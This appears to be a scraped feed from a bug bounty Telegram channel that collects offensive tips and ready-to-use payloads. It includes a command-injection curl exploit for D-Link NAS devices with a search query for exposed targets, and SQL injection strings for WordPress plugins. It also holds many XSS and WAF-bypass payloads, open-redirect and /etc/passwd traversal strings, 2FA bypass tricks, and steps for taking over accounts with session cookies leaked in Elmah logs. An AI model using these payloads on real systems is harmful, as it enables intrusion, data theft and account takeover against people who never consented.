2777
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Bypassing Two-Factor Authentication (2FA)
1. Flawed Two-Factor Verification Logic
- Attackers can log in with their own credentials but change the account cookie to any arbitrary username when submitting the verification code.
2. Clickjacking on 2FA Disable Feature
- Try to iframe the page where 2FA can be disabled. If successful, use social engineering to trick the victim.
3. Response Manipulation
- Check the 2FA request response. If it shows "Success":false, change it to "Success":true to bypass 2FA.
☄️Bug Bounty Tip: Finding Confidential Documents Fast☄️
1.Use Katana to scan for document URLs:
katana -u subdomainsList -em pdf,docx | tee endpointsPDF_DOC
grep -i 'redacted.*\.pdf$' endpointsPDF_DOC | sed -E 's/[-_]?redacted//gi' | sort -u | httpx -mc 200 -sc
CVE-2024-10914 (CVSS 9.2): Command Injection Flaw Threatens 61,000+ D-Link NAS Devices
The vulnerability is localized to the account_mgr.cgi script, particularly in the handling of the cgi_user_add command. The name parameter in this script does not adequately sanitize input, allowing for command execution.
Exploit:
curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27"
DNS-320 – Version 1.00
DNS-320LW – Version 1.01.0914.2012
DNS-325 – Versions 1.01 and 1.02
DNS-340L – Version 1.08
FOFA: app="D_Link-DNS-ShareCenter"Читать полностью…
𝗔𝗽𝗽𝗹𝘆𝗶𝗻𝗴 𝗟𝗟𝗠'𝘀 & 𝗚𝗲𝗻 𝗔𝗜 𝘁𝗼 𝗖𝘆𝗯𝗲𝗿𝘀𝗲𝗰𝘂𝗿𝗶𝘁𝘆 🍁
List of resources for everything you need to know about how to build and apply LLMs even if you don't have a background in data science, software engineering, machine learning, AI, but want to join the GenAI wave
Link 🔗:-
https://start.me/p/9oJvxx/applying-llms-genai-to-cyber-security
Check for Subdomain Takeover Vulnerabilities
This enumerates subdomains and checks if they resolve. Subdomains that return NXDOMAIN may be vulnerable to takeover if they point to external services.
subfinder -d target.com -silent | while read sub; do host $sub; done | grep "NXDOMAIN"
Learn javascript that helps you to read js files, Most important thing to do.
I Found a medium article on it that explain everything, MUST READ.
Part 1: https://bitthebyte.medium.com/javascript-for-bug-bounty-hunters-part-1-dd08ed34b5a8
Part 2: https://bitthebyte.medium.com/javascript-for-bug-bounty-hunters-part-2-f82164917e7
Part 3: https://bitthebyte.medium.com/javascript-for-bug-bounty-hunters-part-3-3b987f24ab27
https://github.com/ferreiraklet/jeeves
Time Based Blind Injection Scanner
👻Scripting with Bash Course📞
What is Bash?
Bash is a scripting language used to deal with the operating system, especially in Linux and macOS It lets you run commands and automate tasks by writing scripts which are just files containing series of commands It’s commonly used for things like managing files, running programs, and automating repetitive tasks
It's very simple and easy to learn i highly recommend it to learn and start your automation journey .
Uploaded by @BugSpy💘
Make me admin in your channel to get more followers !! And awesome content for free
CVE ID : CVE-2024-5522
System : wordpress
Type : sql injectiton
Exploit :
HTML5 Video Player WordPress plugin before 2.5.27
GET /wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -Anther PoC
% time curl "https://example.com/?rest_route=/h5vp/v1/video/1&id=1'+OR+(SELECT+1+FROM+(SELECT(SLEEP(5)))xyz)--+-"Читать полностью…
{"code":"not_found","message":"Data not found","data":{"status":404}}curl 0.01s user 0.02s system 0% cpu 5.760 total
CVE ID : CVE-2015-7377
System : wordpress
Type : Reflected XSS
Exploit :
Effects
Pie Register WordPress Plugin 2.0.18
XSS with base64 encode
http://localhost/wordpress/?page=pie-register&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
you can try this effective manual openredirect Bypass:
1. Null-byte injection:
- /google.com%00/
- //google.com%00
2. Base64 encoding variations:
- aHR0cDovL2dvb2dsZS5jb20=
- aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
- //base64:d3d3Lmdvb2dsZS5jb20=/
3. Case-sensitive variations:
- //GOOGLE.com/
- //GoOgLe.com/
4. Overlong UTF-8 sequences:
- %C0%AE%C0%AE%2F (overlong encoding for ../)
- %C0%AF%C0%AF%2F%2Fgoogle.com
5. Mixed encoding schemes:
- /%68%74%74%70://google.com
- //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
- //base64:%2F%2Fgoogle.com/
6. Alternative domain notations:
- //google.com@127.0.0.1/
- //127.0.0.1.xip.io/
- //0x7F000001/ (hexadecimal IP)
7. Trailing special characters:
- //google.com/#/
- //google.com/;&/
- //google.com/?id=123&//
8. Octal IP address format:
- http://0177.0.0.1/
- http://00177.0000.0000.0001/
9. IP address variants:
- http://3232235777 (decimal notation of an IP)
- http://0xC0A80001 (hex notation of IP)
- http://192.168.1.1/
10. Path traversal with encoding:
- /..%252f..%252f..%252fetc/passwd
- /%252e%252e/%252e%252e/%252e%252e/etc/passwd
- /..%5c..%5c..%5cwindows/system32/cmd.exe
11. Alternate protocol inclusion:
- ftp://google.com/
- javascript:alert(1)//google.com
12. Protocol-relative URLs:
- :////google.com/
- :///google.com/
13. Redirection edge cases:
- //google.com/?q=//bing.com/
- //google.com?q=https://another-site.com/
14. IPv6 notation:
- http://[::1]/
- http://[::ffff:192.168.1.1]/
15. Double URL encoding:
- %252f%252fgoogle.com (encoded twice)
- %255cgoogle.com
16. Combined traversal & encoding:
- /%2E%2E/%2E%2E/etc/passwd
- /%2e%2e%5c%2e%2e/etc/passwd
17. Reverse DNS-based:
- https://google.com.reverselookup.com
- //lookup-reversed.google.com/
18. Non-standard ports:
- http://google.com:81/
- https://google.com:444/
19. Unicode obfuscation in paths:
- /%E2%80%8Egoogle.com/
- /%C2%A0google.com/
20. Query parameters obfuscation:
- //google.com/?q=http://another-site.com/
- //google.com/?redirect=https://google.com/
21. Using @ symbol for userinfo:
- https://admin:password@google.com/
- http://@google.com
22. Combination of userinfo and traversal:
- https://admin:password@google.com/../../etc/passwd
Reflected XSS Akami Waf Bypass in Redirect Parameter using HTTP Parameter Pollution and Double URL Encode:⚙️
/login?ReturnUrl=javascript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529Читать полностью…
an XSS payload to bypass some waf & filters in Firefox
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
Pre-Auth RCE CyberPanel 0day by Chirag Artani 🔥
Useful video from our friend's channel about one of the freshest big vulnerabilities with Netlas search 🔎
We also recommend checking out his website and Twitter for more tips:
👉 Site: 3rag.com
👉 Twitter: x.com/Chirag99Artani
a XSS payload with Alert Obfuscation, for bypass Regex filter
<img src="X" onerror=top[8680439..toString(30)](1337)>
<script>top[8680439..toString(30)](1337)</script>
⚠️ S3 Bucket Recon ⚠️
Source : https://github.com/securitycipher/awsome-websecurity-checklist/blob/main/Mindmaps/S3-Bucket%20Recon.png
[ Passive Recon: Subdomains]
Key points of the report:
💬 What is DNS
💬 Difference between DNS and Vhost
💬 Working with passive DNS
💬 Popular dictionaries for searching
💬 Search utilities
Bug Bounty tips
IDOR via Reset password link
1- Ask for reset password
2- Click on the link and add new pass
3- Intercept the request with burpsuite
4- Found email parameter
5- Replace my email to the victim email
6- Found that the password of the victim is changed.
Breaking Down Multipart Parsers: File upload validation bypass
https://blog.sicuranext.com/breaking-down-multipart-parsers-validation-bypass/
Dorks and JS Files by zseano
https://www.youtube.com/watch?v=0jM8dDVifaI
Reduce Noise in Burp Suite with This Simple Trick! 🔥
💡 Just add the following patterns in Burp Suite under Proxy > Options > TLS Pass Through:
.*\.google\.com
.*\.gstatic\.com
.*\.googleapis\.com
.*\.pki\.goog
.*\.mozilla\..*
🕷Robofinder
I've developed a Python script that allows you to search for and retrieve historical robots.txt files for any given website using Archive.org. This tool is particularly useful for security researchers and web archivists to discover previously accessible paths or directories that were once listed in a site's robots.txt.
1. Clone the repository and install the required dependencies:
git clone https://github.com/Spix0r/robofinder.git
cd robofinder
pip install -r requirements.txt
2. Run the program by providing a URL with the -u flag:
python3 robofinder.py -u https://example.com
👀 Discover additional commands and options on GitHub page (don’t forget to give it a star ⭐️)👇
📱Github: 🔗Link
#CyberSecurity #bugbountyTools #bugbounty #Recon #reconnaissance #infosec #Archive #bugbountytips
🔸🔸🔸🔸🔸🔸🔸🔸
⚡ Boost The Channel
🕷 /channel/bugbounty_tech
🔸🔸🔸🔸🔸🔸🔸🔸
🕵️ How to Leverage Elmah Disclosures for Account Takeover:
1️⃣ Locate the Elmah File: Found an Elmah file on your target? Open it by navigating to /elmah or /elmah.axd.
2️⃣ View Error Logs: Click "Details" on any log entry to reveal the full HTTP request, including headers.
3️⃣ Look for Session Cookies: The details may expose session cookies or internal routes tied to authenticated users.
4️⃣ Attempt Account Access: Use the disclosed session cookies on a request to the target, e.g., http://example[.]com. In many cases, this results in access to an internal employee or administrative accounts!
CVE ID : CVE-2024-6646
System : Netgear WN604
Type : Path Traversal
Exploit :
GET /downloadFile.php?file=config HTTP/1.1Читать полностью…
SQLI Injection
CVE: 2024-36837
Payload: 0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334
#BugBounty #Tips
Cloudflare #XSS WAF Bypass by @nav1n0x
Payload:
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
A solid XSS payload that bypasses Imperva WAF ⚙️
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
Retrieves DNS records without any authentication
curl -s "https://api.hackertarget.com/dnslookup/?q=example.com"
Find sensitive files using Wayback
waybackurls 123.com | grep - -color -E "1.xls | \\.tar.gz | \\.bak | \\.xml | \\.xlsx | \\.json | \\.rar | \\.pdf | \\.sql | \\.doc | \\.docx | \\.pptx | \\.txt | \\.zip | \\.tgz | \\.7z"
https://xplo1t-sec.github.io/bugbounty-lookup/
Читать полностью…